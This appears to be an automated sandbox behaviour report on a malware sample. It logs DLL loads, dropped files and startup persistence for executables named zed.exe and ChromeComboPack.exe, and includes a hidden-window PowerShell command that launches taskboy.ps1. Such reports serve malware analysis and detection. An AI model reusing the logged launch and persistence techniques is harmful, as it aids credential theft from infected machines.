Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: tcl86t.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: tk86t.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: netapi32.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: userenv.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: zlib1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: logoncli.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: netutils.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: samcli.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: mswsock.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: textinputframework.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: coremessaging.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: ntmarta.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: wintypes.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: wintypes.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: version.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: libffi-8.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: propsys.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: libssl-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: mswsock.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: sqlite3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: pywintypes312.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: dpapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\vssadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32
Source: RunTaskboyOnStartup.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: zed.exe, 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AF41000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: cryptography_rust.pdbc source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: zed.exe, 0000000C.00000002.4762838959.00007FFDA3594000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap` source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3025129202.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: zed.exe, 00000006.00000003.2957363790.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3009033416.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4773436095.00007FFDA5533000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AEA9000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: zed.exe, 00000006.00000003.2957363790.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3009033416.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4773436095.00007FFDA5533000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_tkinter.pdb source: zed.exe, 0000000C.00000002.4772130024.00007FFDA46B8000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AF41000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: zed.exe, 00000006.00000003.2957527840.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3010931232.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4772549604.00007FFDA46D5000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: k1k2k3X9_62_PENTANOMIALp.otherp.onBasisp.tpBasisp.ppBasismX9_62_CHARACTERISTIC_TWOp.primep.char_twofieldTypeX9_62_FIELDIDX9_62_CURVEfieldIDcurvebaseECPARAMETERSvalue.named_curvevalue.parametersvalue.implicitlyCAECPKPARAMETERSprivateKeyparameterspublicKeyEC_PRIVATEKEYec_asn1_group2fieldidcrypto\ec\ec_asn1.cec_asn1_group2curveEC_GROUP_get_ecparametersEC_GROUP_get_ecpkparametersEC_GROUP_new_from_ecparametersEC_GROUP_new_from_ecpkparametersi2d_ECPKParametersd2i_ECPrivateKeyi2d_ECPrivateKeyi2d_ECParametersd2i_ECParameterso2i_ECPublicKeyi2o_ECPublicKeycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Tue Sep 3 19:22:24 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: zed.exe, 0000000C.00000002.4773886122.00007FFDA5B83000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: zed.exe, 0000000C.00000002.4767256618.00007FFDA4171000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764105632.00007FFDA3617000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764807705.00007FFDA368C000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: zed.exe, 0000000C.00000002.4764475130.00007FFDA3652000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026160093.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4771312925.00007FFDA4633000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764807705.00007FFDA368C000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4766514931.00007FFDA3ECE000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: zed.exe, 0000000C.00000002.4772989028.00007FFDA5494000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4765265995.00007FFDA3A89000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: cryptography_rust.pdb source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: zed.exe, 0000000C.00000002.4772989028.00007FFDA5494000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: zed.exe, 0000000C.00000002.4733289830.00000132F7DD0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: zed.exe, 00000006.00000003.2957527840.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3010931232.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4772549604.00007FFDA46D5000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: zed.exe, 0000000C.00000002.4762838959.00007FFDA3594000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: zed.exe, 0000000C.00000002.4763446184.00007FFDA35ED000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -File "C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1"
Source: VCRUNTIME140_1.dll.6.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 34_2_00007FFD8A19DB00 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree,34_2_00007FFD8A19DB00
Source: libssl-3.dll.6.drStatic PE information: section name: .00cfg
Source: libcrypto-3.dll.6.drStatic PE information: section name: .00cfg
Source: python312.dll.6.drStatic PE information: section name: PyRuntim
Source: zlib1.dll.6.drStatic PE information: section name: .xdata
Source: VCRUNTIME140.dll.6.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.6.drStatic PE information: section name: _RDATA
Source: libssl-3.dll.7.drStatic PE information: section name: .00cfg
Source: libcrypto-3.dll.7.drStatic PE information: section name: .00cfg
Source: python312.dll.7.drStatic PE information: section name: PyRuntim
Source: zlib1.dll.7.drStatic PE information: section name: .xdata
Source: VCRUNTIME140.dll.7.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.7.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD343AD2A5 pushad ; iretd 0_2_00007FFD343AD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344C7261 push ebx; iretd 0_2_00007FFD344C756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344D4C7E push esp; retf 0_2_00007FFD344D4C7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344C0952 push E95ABED0h; ret 0_2_00007FFD344C09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344C9AC8 push E85D9322h; ret 0_2_00007FFD344C9BF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34596E04 push ss; iretd 0_2_00007FFD34596E07
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34840EEA push eax; iretd 0_2_00007FFD34840EEB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34847A06 push ss; ret 0_2_00007FFD34847A07

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\gogjothegoat\payload\zed.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeProcess created: "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_hashlib.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\select.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_clmul.pydJump to dropped file
